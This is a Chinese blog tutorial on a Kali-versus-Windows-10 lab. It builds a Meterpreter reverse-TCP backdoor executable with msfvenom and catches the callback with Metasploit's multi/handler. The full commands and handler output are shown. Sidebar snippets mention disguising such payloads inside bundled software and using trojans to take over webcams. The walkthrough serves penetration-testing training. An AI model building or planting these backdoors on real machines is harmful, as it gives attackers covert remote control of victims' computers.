远程控制目标主机

最新推荐文章于 2023-04-30 20:55:07 发布
最新推荐文章于 2023-04-30 20:55:07 发布
阅读量2.1k 收藏 8
点赞数
分类专栏: KaliLinux渗透实践 文章标签: Kali Linux 渗透测试 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38243607/article/details/107248187
版权
本文介绍了如何在Kali Linux环境下进行远程控制目标主机的实战操作,包括使用msfvenom生成被控端,通过msfconsole启动主控端,并详细解释了远程控制程序的基础知识和msfvenom工具的使用方法。实战环节中,通过在Win10目标主机上执行生成的payload.exe,成功建立了反向连接,实现了远程控制。
摘要由CSDN通过智能技术生成

目录

 

远程控制程序基础

实战:远程控制目标主机

工具使用

msfvenom

msfconsole

远程控制程序基础

  远程控制程序可以说是一个框架,指可以在一台设备上操纵另一台设备。它包括被控端和主控端,被控端是运行在目标主机上的程序,可以是一段代码也可以是一个直接执行的程序,含义上等同于木马;主控端在攻击机上执行。

  根据主控端和被控端的连接方式,可以将远程控制软件分为正向和反向。

  这里主要介绍一下反向控制,大部分的远程控制软件都采用远程控制的方式。当目标主机执行被控制端后,会通知源主机“我已经被你控制啦,请下命令吧!”。因此攻击机只需要设置好等待目标主机连接的源端口和IP地址(自己的IP地址)就可以了,无需知道目标主机的IP地址。

被控端需要在攻击机中用相关工具生成,也可以自定义。

 

实战:远程控制目标主机

环境:主控端:Kali Linux·2020.1b

           被控端:Win10

            虚拟机桥接上网

步骤:

1、生成被控端

     执行命令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.120 lport=5000 -f exe -o /root/payload.exe

       执行效果:

     

这个命令的作用是 msfvenom自带的payload(windows/meterpreter/reverse_tcp)生成被控制端,规定这个被控制端的类型为可执行文件和保存在Kali中的位置,并且设置等待连接的源IP地址和端口号。

windows/meterpreter/reverse_tcp其实就是可以直接在计算机中执行的代码(称为payload),只不过通过这个命令将其编译成我们需要的格式。

生成被控制端后,将这个可执行文件复制到目标主机中。

2、 在Kali Linux中启动主控端

(1) 启动Metasploit

root@kali:/# msfconsole

执行效果:

 

 (2)启动handler模块作为主控端

msf5 > use exploit/multi/handler

(3) 设置前面生成的被控制端程序,然后等待被控制端连接

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.120
lhost => 192.168.43.120
msf5 exploit(multi/handler) > set lport 5000
lport => 5000
msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.43.120:5000 
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] exploit: Interrupted
msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.43.120:5000

执行完最后一条命令后,双击目标主机中的payload.exe

上述命令没有执行成功,源端口改为4444后成功 ,原因可能是因为windows/meterpreter/reverse_tcp这个payload文件默认的端口为4444,在下面的介绍中会看到这一点,可能是不能修改。

 在这里重新修改一次就好,上一个步骤的命令可以不用改动。

 出现最后一行红框中的内容表示被控端已经被控制 

最低0.47元/天 解锁文章
Blankup
关注
专栏目录
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2615
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
牛掰!从sql注入到连接3389只需这几步
Appleteachers的博客
05-21 2203
REST 是一种现代架构风格,它定义了一种设计 Web 服务的新方法。和之前的 HTTP 以及 SOA 不同,它不是一个协议(即:一套严格的规则),而是一些关于 Web 服务应该如何相互通信的一些建议和最佳实践。按照 REST 最佳实践开发的服务被称为 “RESTful Web 服务”。 安全性是 RESTful 服务的基石。启用它的方法之一是尽可能内置用户身份验证和授权机制。 在 RESTful 服务中实现用户身份验证和授权的方法有很多。我们今天要讲的主要方法(或标准)有: Basic 认证 OAuth
linux 远程执行漏洞,Linux版“永恒之蓝”远程代码执行漏洞技术分析
weixin_32346177的博客
05-06 528
作者:天融信阿尔法实验室 李喆 李闪 姜利晓一、漏洞描述Samba 是一套可使 UNIX 系列的操作系统与微软 Windows 操作系统的 SMB/CIFS 网络协议做连结的自由软件。这个漏洞使得 Samba 客户端可以主动上传共享库到 Samba 服务器同时加载并执行该动态库导出函数。攻击者利用漏洞可以进行远程代码执行,具体执行条件如下:系统开启了文件/打印机共享端口445共享文件夹拥有写入权限...
教你编写远程溢出EXPLOIT
0ffs3t
02-15 922
译者注:想必很多朋友都对缓冲区溢出非常了解了,网上也有很多关于windows下的缓冲区溢出漏洞的利用教程(本人也写过几篇)。但是linux下的完整溢出教程我还未看到过(也许是本人眼拙吧)。今天在国外的一个论坛发现这篇文章,感觉此文是一个非常不错的基础教程,因此决定翻译出来供大家鉴赏,自己也算是锻炼一下英语翻译吧:-)(其实我是在看完整篇文章后,根据自己的理解写的,几乎一点翻译都没有)   译文
网安小白学kali——植入木马控制靶机摄像头
最新发布
weixin_58457050的博客
04-30 5232
植入木马监控(钓鱼式)
Python Tricks 使用 pywinrm 远程控制 Windows 主机的方法
09-16
2. **创建会话**:使用 `winrm.Session` 创建一个会话对象,并指定目标主机地址以及登录凭据。 ```python import winrm session = winrm.Session('xx.xx.xx.xx', auth=('username', 'password')) ``` 3. **...
python远程连接windows主机_Python Tricks —— 使用 pywinrm 远程控制 Windows 主机
weixin_28909161的博客
12-23 1248
WinRM 即 Windows Remote Management,是微软对于 WS-Management 远程管理协议的实现。一、受控端配置 WinRM 服务方式一:cmd 命令行(管理员)启用 WinRM 远程服务:winrm quickconfig查看 WinRM 服务监听状态:winrm e winrm/config/listenerC:\Windows\system32>winrm...
基于Python(pyqt5 )的远程控制主机【100011560】
04-04
远程控制功能的核心在于实现对目标主机的鼠标和键盘输入的模拟,这通常通过发送特定的指令来完成。Python中有一些库,如pynput,可以帮助我们实现这一目标。通过这个库,开发者可以捕获本地的键盘和鼠标事件,并将...
linux打开端口号失败,Linux Kali iptables开放22端口失败等问题的解决方法
weixin_28711397的博客
04-30 2063
这篇文章是针对2020年下载安装的kali系统碰到的关于 iptables开放22端口失败等一系列问题的解决办法,如果是其它系统,可以借鉴一下思路。各种报错:# sudo systemctl start iptablesFailed to start iptables.service: Unit iptables.service not found.# sudo systemctl enable ...
kali渗透Windows
m0_51786204的博客
04-03 1300
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就行。解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址。(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)(2)命令: sessions -i 1(选择需要攻击的用户,这里选择第 1 个)可以写个容易让目标主机上钩的名字。
msfvenom制作主控与被控端
angleoldhen的专栏
07-28 370
msfvenom如何制作主控与被控端 ,如何编码,如何使用upx加壳
kubertest自动补全命令不生效_Kali 工具 之 Msfvenom 命令自动补全篇
weixin_39586649的博客
11-20 562
本文作者:nan0(Ms08067实验室红队小组成员)0X00 背景:msfvenom大家都不陌生,在我们使用MSF进行权限维持,内网渗透的时候都会用到,支持的语言的种类很多。大家都知道我们在使用msfvenom 的时候需要手动输入很多参数,这些参数需要记忆,或记在其它地方,用的时候在查看使用哪个参数,哪条命令,非常的不方便。比如:我要生成一个 32 位 exe 的 payload,命令...
HTB Beep[Hack The Box HTB靶场]writeup系列5
重新启程
02-04 3580
本题是retire机器的第五台了 目录 0x00 靶场信息 0x01 信息搜集 0x02 业务探测 80端口主页:elastix freepbx 80端口mail业务:roundcube webmail 10000端口:webmin 0x03 漏洞分析 elastix roundcube webmin 0x03 web攻击 roundcube webmin elas...
interrupt()方法和InterruptException异常
洛豳枭薰
05-13 5550
interrupt()方法和InterruptException异常,是java专门用来处理线程阻塞的。线程阻塞,就表示要等待一段时间。如果需要等待的时间比较长,正常还没结束之前想中断某个线程的阻塞状态怎么办?这就是靠interrupt()方法来解决了。如果因为一些特殊的原因,想提前中断一些阻塞的线程,以让他们提前解除阻塞状态,然后继续执行下去。只需要在其他线程调用指定线程的interrupt()...
HTB Arctic[ATT&CK模型]writeup系列7
重新启程
02-05 3641
目录 0x00 靶机情况 0x01 ATT&CK ATT&CK能用来干什么? 网空威胁行为体(CyberThreat Actors) ATT&CK模型 TTP的定义 0x02 PRE-ATT&CK 一、Priority Definition(优先级定义) 二、Target Selection(选择目标) 三、Information Gat...
Kali-利用metasploit中的exploit/multi/handler进行攻击
热门推荐
齐泽文的Blog
04-22 1万+
在攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台root@qzwhost:~# msfconsole msfconsole > use exploit/multi/handl...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值